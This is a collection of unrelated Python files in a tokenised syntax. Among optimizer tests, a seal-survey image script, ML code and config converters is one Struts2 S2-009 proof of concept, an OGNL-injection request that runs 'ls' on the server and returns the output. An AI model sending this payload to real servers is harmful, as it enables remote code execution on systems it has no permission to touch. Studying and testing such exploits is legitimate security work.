<import_stmt>numpy<as>np<import_from_stmt>opytimizer.optimizers.science mvo<import_from_stmt>opytimizer.spaces search<def_stmt>test_mvo_params <block_start>params={'WEP_min':0.2 'WEP_max':1.0 'p':0.5}<line_sep>new_mvo=mvo.MVO(params=params)<assert_stmt>new_mvo.WEP_min<eq>0.2<assert_stmt>new_mvo.WEP_max<eq>1.0<assert_stmt>new_mvo.p<eq>0.5<block_end><def_stmt>test_mvo_params_setter <block_start>new_mvo=mvo.MVO()<try_stmt><block_start>new_mvo.WEP_min='a'<block_end><except_stmt><block_start>new_mvo.WEP_min=0.75<block_end><try_stmt><block_start>new_mvo.WEP_min=-1<block_end><except_stmt><block_start>new_mvo.WEP_min=0.75<block_end><assert_stmt>new_mvo.WEP_min<eq>0.75<try_stmt><block_start>new_mvo.WEP_max='b'<block_end><except_stmt><block_start>new_mvo.WEP_max=0.9<block_end><try_stmt><block_start>new_mvo.WEP_max=0.1<block_end><except_stmt><block_start>new_mvo.WEP_max=0.9<block_end><try_stmt><block_start>new_mvo.WEP_max=-1<block_end><except_stmt><block_start>new_mvo.WEP_max=0.9<block_end><assert_stmt>new_mvo.WEP_max<eq>0.9<try_stmt><block_start>new_mvo.p='c'<block_end><except_stmt><block_start>new_mvo.p=0.25<block_end><try_stmt><block_start>new_mvo.p=-1<block_end><except_stmt><block_start>new_mvo.p=0.25<block_end><assert_stmt>new_mvo.p<eq>0.25<block_end><def_stmt>test_mvo_update <block_start><def_stmt>square x<block_start><return>np.sum(x<power>2)<block_end>new_mvo=mvo.MVO()<line_sep>search_space=search.SearchSpace(n_agents=2 n_variables=2 lower_bound=[1 1] upper_bound=[10 10])<line_sep>new_mvo.update(search_space square 1 10)<line_sep>new_mvo.update(search_space square 5 10)<block_end>
|
#%% Imports and constants
<import_stmt>os<import_stmt>pandas<as>pd<import_from_stmt>tqdm tqdm<line_sep># from github.com/microsoft/ai4eutils
<import_stmt>url_utils<line_sep># from github.com/microsoft/cameratraps
<import_from_stmt>visualization visualization_utils<line_sep># A list of files in the lilablobssc container for this data set
container_file_list=r'C:\temp\seals\seal_files.txt'<line_sep># The raw detection files provided by NOAA
detections_fn=r'C:\temp\seals\surv_test_kamera_detections_20210212.csv'<line_sep># A version of the above with filename columns added
detections_fn_full_paths=detections_fn.replace('.csv' '_full_paths.csv')<line_sep>base_url='https://lilablobssc.blob.core.windows.net/noaa-kotz'<line_sep>#%% Read input .csv
df=pd.read_csv(detections_fn)<line_sep>df['rgb_image_path']=''<line_sep>df['ir_image_path']=''<line_sep>print('Read {} rows from {}'.format(len(df) detections_fn))<line_sep>camera_view_to_path={}<line_sep>camera_view_to_path['C']='CENT'<line_sep>camera_view_to_path['L']='LEFT'<line_sep>valid_flights=set(['fl04' 'fl05' 'fl06' 'fl07'])<line_sep>#%% Read list of files
<with_stmt>open(container_file_list 'r')<as>f<block_start>all_files=f.readlines()<block_end>all_files=[s.strip()<for>s all_files]<line_sep>all_files=set(all_files)<line_sep>#%% Convert paths to full paths
missing_ir_files=[]<line_sep># i_row = 0; row = df.iloc[i_row]
<for_stmt>i_row,row tqdm(df.iterrows() total=len(df))<block_start><assert_stmt>row['flight']<in>valid_flights<assert_stmt>row['camera_view']<in>camera_view_to_path<assert_stmt>isinstance(row['rgb_image_name'] str)<line_sep>rgb_image_path='Images/{}/{}/{}'.format(row['flight'] camera_view_to_path[row['camera_view']] row['rgb_image_name'])<assert_stmt>rgb_image_path<in>all_files<line_sep>df.loc[i_row 'rgb_image_path']=rgb_image_path<if_stmt><not>isinstance(row['ir_image_name'] str)<block_start><continue><block_end>ir_image_path='Images/{}/{}/{}'.format(row['flight'] camera_view_to_path[row['camera_view']] row['ir_image_name'])<line_sep># assert ir_image_path in all_files
<if_stmt>ir_image_path<not><in>all_files<block_start>missing_ir_files.append(ir_image_path)<block_end>df.loc[i_row 'ir_image_path']=ir_image_path<block_end># ...for each row
missing_ir_files=list(set(missing_ir_files))<line_sep>missing_ir_files.sort()<line_sep>print('{} missing IR files (of {})'.format(len(missing_ir_files) len(df)))<for_stmt>s missing_ir_files<block_start>print(s)<block_end>#%% Write results
df.to_csv(detections_fn_full_paths index=<false>)<line_sep>#%% Load output file, just to be sure
df=pd.read_csv(detections_fn_full_paths)<line_sep>#%% Render annotations on an image
<import_stmt>random<line_sep>i_image=random.randint(0 len(df))<line_sep># i_image = 2004
row=df.iloc[i_image]<line_sep>rgb_image_path=row['rgb_image_path']<line_sep>rgb_image_url=base_url+'/'+rgb_image_path<line_sep>ir_image_path=row['ir_image_path']<line_sep>ir_image_url=base_url+'/'+ir_image_path<line_sep>#%% Download the image
rgb_image_fn=url_utils.download_url(rgb_image_url progress_updater=<true>)<line_sep>ir_image_fn=url_utils.download_url(ir_image_url progress_updater=<true>)<line_sep>#%% Find all the rows (detections) associated with this image
# as l,r,t,b
rgb_boxes=[]<line_sep>ir_boxes=[]<for_stmt>i_row,row df.iterrows()<block_start><if_stmt>row['rgb_image_path']<eq>rgb_image_path<block_start>box_l=row['rgb_left']<line_sep>box_r=row['rgb_right']<line_sep>box_t=row['rgb_top']<line_sep>box_b=row['rgb_bottom']<line_sep>rgb_boxes.append([box_l box_r box_t box_b])<block_end><if_stmt>row['ir_image_path']<eq>ir_image_path<block_start>box_l=row['ir_left']<line_sep>box_r=row['ir_right']<line_sep>box_t=row['ir_top']<line_sep>box_b=row['ir_bottom']<line_sep>ir_boxes.append([box_l box_r box_t box_b])<block_end><block_end>print('Found {} RGB, {} IR annotations for this image'.format(len(rgb_boxes) len(ir_boxes)))<line_sep>#%% Render the detections on the image(s)
img_rgb=visualization_utils.load_image(rgb_image_fn)<line_sep>img_ir=visualization_utils.load_image(ir_image_fn)<for_stmt>b rgb_boxes# In pixel coordinates
<block_start>box_left=b[0]<line_sep>box_right=b[1]<line_sep>box_top=b[2]<line_sep>box_bottom=b[3]<assert_stmt>box_top<g>box_bottom<assert_stmt>box_right<g>box_left<line_sep>ymin=box_bottom<line_sep>ymax=box_top<line_sep>xmin=box_left<line_sep>xmax=box_right<line_sep>visualization_utils.draw_bounding_box_on_image(img_rgb ymin xmin ymax xmax use_normalized_coordinates=<false> thickness=3)<block_end><for_stmt>b ir_boxes# In pixel coordinates
<block_start>box_left=b[0]<line_sep>box_right=b[1]<line_sep>box_top=b[2]<line_sep>box_bottom=b[3]<assert_stmt>box_top<g>box_bottom<assert_stmt>box_right<g>box_left<line_sep>ymin=box_bottom<line_sep>ymax=box_top<line_sep>xmin=box_left<line_sep>xmax=box_right<line_sep>visualization_utils.draw_bounding_box_on_image(img_ir ymin xmin ymax xmax use_normalized_coordinates=<false> thickness=3)<block_end>visualization_utils.show_images_in_a_row([img_rgb img_ir])<line_sep>#%% Save images
img_rgb.save(r'c:\temp\seals_rgb.png')<line_sep>img_ir.save(r'c:\temp\seals_ir.png')<line_sep>#%% Clean up
<import_stmt>shutil<line_sep>tmp_dir=os.path.dirname(rgb_image_fn)<assert_stmt>'ai4eutils'<in>tmp_dir<line_sep>shutil.rmtree(tmp_dir)<line_sep>
|
<import_stmt>pprint<line_sep>print(type(dir(__builtins__)))<line_sep># <class 'list'>
print(len(dir(__builtins__)))<line_sep># 153
pprint.pprint(dir(__builtins__) compact=<true>)<line_sep># ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException',
# 'BlockingIOError', 'BrokenPipeError', 'BufferError', 'BytesWarning',
# 'ChildProcessError', 'ConnectionAbortedError', 'ConnectionError',
# 'ConnectionRefusedError', 'ConnectionResetError', 'DeprecationWarning',
# 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False',
# 'FileExistsError', 'FileNotFoundError', 'FloatingPointError', 'FutureWarning',
# 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError',
# 'IndexError', 'InterruptedError', 'IsADirectoryError', 'KeyError',
# 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'ModuleNotFoundError',
# 'NameError', 'None', 'NotADirectoryError', 'NotImplemented',
# 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning',
# 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError',
# 'ResourceWarning', 'RuntimeError', 'RuntimeWarning', 'StopAsyncIteration',
# 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit',
# 'TabError', 'TimeoutError', 'True', 'TypeError', 'UnboundLocalError',
# 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError',
# 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError',
# 'Warning', 'ZeroDivisionError', '__IPYTHON__', '__build_class__', '__debug__',
# '__doc__', '__import__', '__loader__', '__name__', '__package__', '__spec__',
# 'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray',
# 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright',
# 'credits', 'delattr', 'dict', 'dir', 'display', 'divmod', 'enumerate', 'eval',
# 'exec', 'filter', 'float', 'format', 'frozenset', 'get_ipython', 'getattr',
# 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int',
# 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map',
# 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow',
# 'print', 'property', 'range', 'repr', 'reversed', 'round', 'set', 'setattr',
# 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
# 'vars', 'zip']
print(dir(__builtins__)[0])<line_sep># ArithmeticError
print(type(dir(__builtins__)[0]))<line_sep># <class 'str'>
pprint.pprint([s<for>s dir(__builtins__)<if>s.islower()<and><not>s.startswith('_')] compact=<true>)<line_sep># ['abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray',
# 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright',
# 'credits', 'delattr', 'dict', 'dir', 'display', 'divmod', 'enumerate', 'eval',
# 'exec', 'filter', 'float', 'format', 'frozenset', 'get_ipython', 'getattr',
# 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int',
# 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map',
# 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow',
# 'print', 'property', 'range', 'repr', 'reversed', 'round', 'set', 'setattr',
# 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
# 'vars', 'zip']
pprint.pprint([s<for>s dir(__builtins__)<if>s.endswith('Error')] compact=<true>)<line_sep># ['ArithmeticError', 'AssertionError', 'AttributeError', 'BlockingIOError',
# 'BrokenPipeError', 'BufferError', 'ChildProcessError',
# 'ConnectionAbortedError', 'ConnectionError', 'ConnectionRefusedError',
# 'ConnectionResetError', 'EOFError', 'EnvironmentError', 'FileExistsError',
# 'FileNotFoundError', 'FloatingPointError', 'IOError', 'ImportError',
# 'IndentationError', 'IndexError', 'InterruptedError', 'IsADirectoryError',
# 'KeyError', 'LookupError', 'MemoryError', 'ModuleNotFoundError', 'NameError',
# 'NotADirectoryError', 'NotImplementedError', 'OSError', 'OverflowError',
# 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError',
# 'RuntimeError', 'SyntaxError', 'SystemError', 'TabError', 'TimeoutError',
# 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError',
# 'UnicodeError', 'UnicodeTranslateError', 'ValueError', 'ZeroDivisionError']
pprint.pprint([s<for>s dir(__builtins__)<if>s.endswith('Warning')] compact=<true>)<line_sep># ['BytesWarning', 'DeprecationWarning', 'FutureWarning', 'ImportWarning',
# 'PendingDeprecationWarning', 'ResourceWarning', 'RuntimeWarning',
# 'SyntaxWarning', 'UnicodeWarning', 'UserWarning', 'Warning']
print('len'<in>dir(__builtins__))<line_sep># True
|
# Copyright (C) 2021 Intel Corporation. All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#
<import_stmt>lxml<def_stmt>add_child element tag text=<none> **kwargs<block_start>child=lxml.etree.Element(tag)<line_sep>child.text=text<for_stmt>k,v kwargs.items()<block_start>child.set(k v)<block_end>element.append(child)<line_sep><return>child<block_end><def_stmt>get_node etree xpath<block_start>result=etree.xpath(xpath)<assert_stmt>len(result)<le>1 "Internal error: cannot get texts from multiple nodes at a time"<line_sep><return>result[0]<if>len(result)<eq>1<else><none><block_end>
|
<import_stmt>requests<line_sep># url随意
<def_stmt>poc url<block_start>print('test {} --> struts2_009'.format(url))<line_sep>url<augadd>"/ajax/example5.action"<line_sep>#执行ls 命令
exp="?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1"<line_sep>#exp = '''?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
url<augadd>exp<try_stmt><block_start>resp=requests.get(url timeout=10)<line_sep>print(resp)<if_stmt>resp.status_code<eq>200<block_start>print('test --> struts2_009 Success!')<line_sep><return><true><block_end><block_end><except_stmt><block_start>print('test --> struts2_009 Failed!')<line_sep><return><false><block_end><return><false><block_end><if_stmt>__name__<eq>"__main__"<block_start>print(poc('http://127.0.0.1:8080'))<block_end>
|
"""
django-peeringdb backend setup (needed for pdb_load_data command)
"""<import_from_stmt>django_peeringdb.client_adaptor.setup configure# noqa
|
# Copyright 2018/2019 ducandu GmbH, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
<import_stmt>numpy<as>np<import_from_stmt>rlgraph get_backend<import_from_stmt>rlgraph.components.loss_functions.supervised_loss_function SupervisedLossFunction<import_from_stmt>rlgraph.spaces.bool_box BoolBox<import_from_stmt>rlgraph.utils.decorators rlgraph_api<if_stmt>get_backend()<eq>"tf"<block_start><import_stmt>tensorflow<as>tf<block_end><class_stmt>EuclidianDistanceLoss(SupervisedLossFunction)<block_start>"""
Calculates the loss between two vectors (prediction and label) via their Euclidian distance:
d(v,w) = SQRT(SUMi( (vi - wi)² ))
"""<def_stmt>__init__ self time_steps=<none> scope="euclidian-distance" **kwargs<block_start>"""
Args:
time_steps (Optional[int]): If given, reduce-sum linearly over this many timesteps with weights going
from 0.0 (first time-step) to 1.0 (last-timestep).
"""<line_sep>super(EuclidianDistanceLoss self).__init__(scope=scope **kwargs)<line_sep>self.time_steps=time_steps<line_sep>self.reduce_ranks=<none><line_sep>self.time_rank=<none><line_sep>self.time_major=<none><line_sep>self.is_bool=<none><block_end><def_stmt>check_input_spaces self input_spaces action_space=<none><block_start>in_space=input_spaces["labels"]<line_sep>self.is_bool=isinstance(in_space BoolBox)# Need to cast (to 0.0 and 1.0) in graph_fn?
self.reduce_ranks=np.array(list(range(in_space.rank)))<if_stmt>in_space.has_batch_rank<block_start>self.reduce_ranks<augadd>1<block_end><if_stmt>in_space.has_time_rank<block_start>self.reduce_ranks<augadd>1<block_end>self.time_rank=in_space.has_time_rank<line_sep>self.time_major=in_space.time_major<block_end>@rlgraph_api<def_stmt>_graph_fn_loss_per_item self parameters labels sequence_length=<none> time_percentage=<none><block_start>"""
Euclidian distance loss.
Args:
parameters (SingleDataOp): Output predictions.
labels (SingleDataOp): Labels.
sequence_length (SingleDataOp): The lengths of each sequence (if applicable) in the given batch.
Returns:
SingleDataOp: The loss values vector (one single value for each batch item).
"""<line_sep>batch_rank=0<if>self.time_major<is><false><else>1<line_sep>time_rank=0<if>batch_rank<eq>1<else>1<if_stmt>get_backend()<eq>"tf"# Reduce over last rank (vector axis) and take the square root.
<block_start><if_stmt>self.is_bool<block_start>labels=tf.cast(labels tf.float32)<line_sep>parameters=tf.cast(parameters tf.float32)<block_end>euclidian_distance=tf.square(tf.subtract(parameters labels))<line_sep>euclidian_distance=tf.reduce_sum(euclidian_distance axis=self.reduce_ranks)<line_sep>euclidian_distance=tf.sqrt(euclidian_distance)<line_sep># TODO: Make it possible to customize the time-step decay (or increase?) behavior.
# Weight over time-steps (linearly decay weighting over time rank, cutting out entirely values past the
# sequence length).
<if_stmt>sequence_length<is><not><none><block_start>max_time_steps=tf.cast(tf.shape(labels)[time_rank] dtype=tf.float32)<line_sep>sequence_mask=tf.sequence_mask(sequence_length max_time_steps dtype=tf.float32)<line_sep>sequence_decay=tf.expand_dims(tf.range(start=1.0 limit=0.0 delta=-1.0/max_time_steps dtype=tf.float32) axis=batch_rank)<line_sep>weighting=sequence_mask<times>sequence_decay<line_sep>euclidian_distance=tf.multiply(euclidian_distance weighting)<line_sep># Reduce away the time-rank.
euclidian_distance=tf.reduce_sum(euclidian_distance axis=time_rank)<line_sep>euclidian_distance=tf.divide(euclidian_distance tf.cast(sequence_length dtype=tf.float32))<block_end><else_stmt># Reduce away the time-rank.
<block_start><if_stmt>hasattr(parameters "_time_rank")<block_start>euclidian_distance=tf.reduce_mean(euclidian_distance axis=time_rank)<block_end><block_end><return>euclidian_distance<block_end><block_end><block_end>
|
#Sending an email through gmail using Python - <NAME>
<import_stmt>smtplib<line_sep>fromaddr='<EMAIL>'<line_sep>toaddrs='<EMAIL>'<line_sep>msg='Email message from PYTHON Raghuram app'<line_sep>#provide gmail user name and password
username='gmailUserName'<line_sep>password='<PASSWORD>'<line_sep># functions to send an email
server=smtplib.SMTP('smtp.gmail.com:587')<line_sep>server.ehlo()<line_sep>server.starttls()<line_sep>server.ehlo()<line_sep>server.login(username password)<line_sep>server.sendmail(fromaddr toaddrs msg)<line_sep>server.quit()<line_sep>
|
<import_from_stmt>.base_exception MAROException<import_from_stmt>.error_code ERROR_CODE<line_sep>__all__=["ERROR_CODE" "MAROException"]<line_sep>
|
<import_stmt>superimport<import_stmt>numpy<as>np<import_from_stmt>scipy.stats norm<import_from_stmt>scipy.optimize minimize<import_from_stmt>matplotlib pyplot<as>plt<import_from_stmt>cycler cycler<import_stmt>jax.numpy<as>jnp<import_stmt>jax.scipy.stats.norm<as>jnorm<import_from_stmt>jax grad<import_stmt>pyprobml_utils<as>pml<import_from_stmt>statsmodels.discrete.discrete_model Probit<line_sep>cb_color=['#377eb8' '#ff7f00']<line_sep>cb_cycler=(cycler(linestyle=['-' '--' '-.'])<times>cycler(color=cb_color))<line_sep>plt.rc('axes' prop_cycle=cb_cycler)<line_sep>np.random.seed(0)<class_stmt>ProbitReg<block_start><def_stmt>__init__ self<block_start>self.loglikehist=[]<line_sep>self.max_iter=100<line_sep>self.tolerance=1e-4<line_sep>self.w=[]<block_end># Probit-loss = (1-y)*log(1-gauss.cdf(X.w)) - (1-y)*log(gauss.cdf(-(X.w))
<def_stmt>probitloss self X y w# NLL
<block_start><return>-jnp.sum(y<times>jnorm.logcdf(jnp.dot(X w)))-jnp.sum((1-y)<times>jnorm.logcdf(-jnp.dot(X w)))<block_end><def_stmt>objfn self X y w lam# penalized likelihood.
<block_start><return>jnp.sum(lam<times>jnp.square(w[1:]))-self.probitloss(X y w)<block_end><def_stmt>probreg_fit_em self X y lam<block_start>self.w=np.linalg.lstsq(X+np.random.rand(X.shape[0] X.shape[1]) y rcond=<none>)[0].reshape(-1 1)<def_stmt>estep w<block_start>u=X@w<line_sep>z=u+norm.pdf(u)/((y<eq>1)-norm.cdf(-u))<line_sep>loglik=self.objfn(X y w lam)<line_sep><return>z loglik<block_end># M step function is the ridge regression
<def_stmt>mstep X y lam<block_start><return>ridge_reg(X y lam)<block_end>i=1<line_sep>stop=<false><while_stmt><not>stop<block_start>z,loglike=estep(self.w)<line_sep>self.loglikehist.append(loglike)<line_sep>self.w=mstep(X z lam)<if_stmt>i<ge>self.max_iter<block_start>stop=<true><block_end><elif_stmt>i<g>1# if slope becomes less than tolerance.
<block_start>stop=np.abs((self.loglikehist[i-1]-self.loglikehist[i-2])/(self.loglikehist[i-1]+self.loglikehist[i-2]))<le>self.tolerance/2<block_end>i<augadd>1<block_end>self.loglikehist=self.loglikehist[0:i-1]<line_sep><return>self.w np.array(self.loglikehist)<block_end><def_stmt>probit_reg_fit_gradient self X y lam<block_start>winit=jnp.linalg.lstsq(X+np.random.rand(X.shape[0] X.shape[1]) y rcond=<none>)[0].reshape(-1 1)<line_sep>self.loglikehist=[]<line_sep>self.loglikehist.append((-self.objfn(X y winit lam)))<def_stmt>obj w<block_start>w=w.reshape(-1 1)<line_sep># PNLL
<return>self.probitloss(X y w)+jnp.sum(lam<times>jnp.square(w[1:]))<block_end><def_stmt>grad_obj w<block_start><return>grad(obj)(w)<block_end><def_stmt>callback w<block_start>loglik=obj(w)# LL
self.loglikehist.append(loglik)<block_end>res=minimize(obj x0=winit jac=grad_obj callback=callback method='BFGS')<line_sep><return>res['x'] np.array(self.loglikehist[0:-1])<block_end><def_stmt>predict self X w<block_start>p=jnorm.cdf(jnp.dot(X w))<line_sep>y=np.array((p<g>0.5) dtype='int32')<line_sep><return>y p<block_end><block_end># using matrix inversion for ridge regression
<def_stmt>ridge_reg X y lambd# returns weight vectors.
<block_start>D=X.shape[1]<line_sep>w=np.linalg.inv(X.T@X+lambd<times>np.eye(D D))@X.T@y<line_sep><return>w<block_end><def_stmt>flip_bits y p<block_start>x=np.random.rand(y.shape[0] 1)<l>p<line_sep>y[x<l>p]=1-y[x<l>p]<line_sep><return>y<block_end>n,d=100 2<line_sep>data_x=np.random.randn(n d)<line_sep>w=np.random.randn(d 1)<line_sep>data_y=flip_bits((data_x@w<g>0) 0)<line_sep>lam=1e-2<line_sep># statsmodel.Probit
sm_probit_reg=Probit(exog=data_x endog=data_y).fit(disp=0 method='bfgs')<line_sep>sm_probit_prob=sm_probit_reg.predict(exog=data_x)<line_sep># Our Implementation:
probit_reg=ProbitReg()<line_sep># EM:
em_w,obj_trace_em=probit_reg.probreg_fit_em(data_x data_y lam)<line_sep>em_ypred,em_prob=probit_reg.predict(data_x em_w)<line_sep># gradient:
gradient_w,obj_trace_gradient=probit_reg.probit_reg_fit_gradient(data_x data_y lam)<line_sep>gradient_ypred,gradient_prob=probit_reg.predict(data_x gradient_w)<line_sep>plt.figure()<line_sep>plt.plot(sm_probit_prob em_prob 'o')<line_sep>plt.xlabel('statsmodel.probit')<line_sep>plt.ylabel('em')<line_sep>plt.figure()<line_sep>plt.plot(gradient_prob em_prob 'o')<line_sep>plt.xlabel('bfgs')<line_sep>plt.ylabel('em')<line_sep>plt.title('probit regression with L2 regularizer of {0:.3f}'.format(lam))<line_sep>plt.show()<line_sep>plt.figure()<line_sep>plt.plot(-obj_trace_em.flatten() '-o' linewidth=2)<line_sep>plt.plot(obj_trace_gradient.flatten() ':s' linewidth=1)<line_sep>plt.legend(['em' 'bfgs'])<line_sep>plt.title('probit regression with L2 regularizer of {0:.3f}'.format(lam))<line_sep>plt.ylabel('logpost')<line_sep>plt.xlabel('iter')<line_sep>pml.save_fig('../figures/probitRegDemoNLL.pdf')<line_sep>plt.show()<line_sep>
|
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Test the AzureCostModelCostUpdater object."""<import_from_stmt>masu.database.azure_report_db_accessor AzureReportDBAccessor<import_from_stmt>masu.external.date_accessor DateAccessor<import_from_stmt>masu.processor.azure.azure_cost_model_cost_updater AzureCostModelCostUpdater<import_from_stmt>masu.test MasuTestCase<class_stmt>AzureCostModelCostUpdaterTest(MasuTestCase)<block_start>"""Test Cases for the AzureCostModelCostUpdater object."""<def_stmt>test_azure_update_summary_cost_model_costs self<block_start>"""Test to verify Azure derived cost summary is calculated."""<line_sep>updater=AzureCostModelCostUpdater(schema=self.schema provider=self.azure_provider)<line_sep>start_date=DateAccessor().today_with_timezone("UTC")<line_sep>bill_date=start_date.replace(day=1).date()<line_sep>updater.update_summary_cost_model_costs()<with_stmt>AzureReportDBAccessor(self.schema)<as>accessor<block_start>bill=accessor.get_cost_entry_bills_by_date(bill_date)[0]<line_sep>self.assertIsNotNone(bill.derived_cost_datetime)<block_end><block_end><block_end>
|
print('Hello Waldo!')<line_sep>
|
#
# Copyright 2017-2018 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
<import_stmt>json<import_from_stmt>ruamel.yaml YAML<import_stmt>sys<import_stmt>getopt<line_sep>#global variables
language=''<line_sep>inputfile=''<line_sep>outputfile=''<line_sep>samplefile=''<line_sep>yaml=YAML(typ='safe')<def_stmt>getFfDL <block_start><try_stmt><block_start>f=open(inputfile "r")<line_sep>response=f.read()<line_sep>data=yaml.load(response)<line_sep>f.close()<line_sep><return>data<block_end><except_stmt><block_start>print("Missing {}".format(inputfile))<block_end><block_end><def_stmt>getSampleJob <block_start><try_stmt><block_start><if_stmt>samplefile<block_start>f=open(samplefile "r")<block_end><else_stmt><block_start>f=open("sample-FfDL.yaml" "r")<block_end>response=f.read()<line_sep>resYaml=yaml.load(response)<line_sep>f.close()<line_sep><return>resYaml<block_end><except_stmt><block_start>print("Missing sample-FfDL.yaml")<block_end><block_end><def_stmt>createJob sample data<block_start><try_stmt><block_start>sample['framework']['name']=data['model_definition']['framework']['name']<line_sep>sample['name']=data['model_definition']['name']<line_sep>sample['description']=data['model_definition']['description']<line_sep>sample['framework']['command']=data['model_definition']['execution']['command']<line_sep>sample['data_stores'][0]['id']=data['training_data_reference']['name']<line_sep>sample['data_stores'][0]['connection']['auth_url']=data['training_data_reference']['connection']['endpoint_url']<line_sep>sample['data_stores'][0]['connection']['user_name']=data['training_data_reference']['connection']['access_key_id']<line_sep>sample['data_stores'][0]['connection']['password']=data['training_data_reference']['connection']['secret_access_key']<line_sep>sample['data_stores'][0]['training_data']['container']=data['training_data_reference']['source']['bucket']<line_sep>sample['data_stores'][0]['training_results']['container']=data['training_results_reference']['target']['bucket']<line_sep>py2=<false><line_sep>CPU=<false><try_stmt><block_start><if_stmt>data['model_definition']['framework']['name']<eq>'tensorflow'<block_start><if_stmt>'2.'<in>data['model_definition']['framework']['runtimes']['version']<block_start>py2=<true><block_end><block_end><block_end><except_stmt><block_start>py2=<false><block_end><try_stmt><block_start>sample['learners']=int(data['model_definition']['execution']['compute_configuration']['nodes'])<block_end><except_stmt><block_start>sample['learners']=1<block_end># Detect T-shirt requirements
<if_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"k80"<block_start>sample['cpus']=4<line_sep>sample['gpus']=1<line_sep>sample['memory']='24Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"p100"<block_start>sample['cpus']=8<line_sep>sample['gpus']=1<line_sep>sample['memory']='24Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"v100"<block_start>sample['cpus']=26<line_sep>sample['gpus']=1<line_sep>sample['memory']='24Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"k80x2"<block_start>sample['cpus']=8<line_sep>sample['gpus']=2<line_sep>sample['memory']='48Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"p100x2"<block_start>sample['cpus']=16<line_sep>sample['gpus']=2<line_sep>sample['memory']='48Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"v100x2"<block_start>sample['cpus']=52<line_sep>sample['gpus']=2<line_sep>sample['memory']='48Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"k80x4"<block_start>sample['cpus']=16<line_sep>sample['gpus']=4<line_sep>sample['memory']='96Gb'<block_end><else_stmt><block_start>CPU=<true><line_sep>sample['cpus']=1<line_sep>sample['gpus']=0<line_sep>sample['memory']='1Gb'<block_end># Detect Framework version
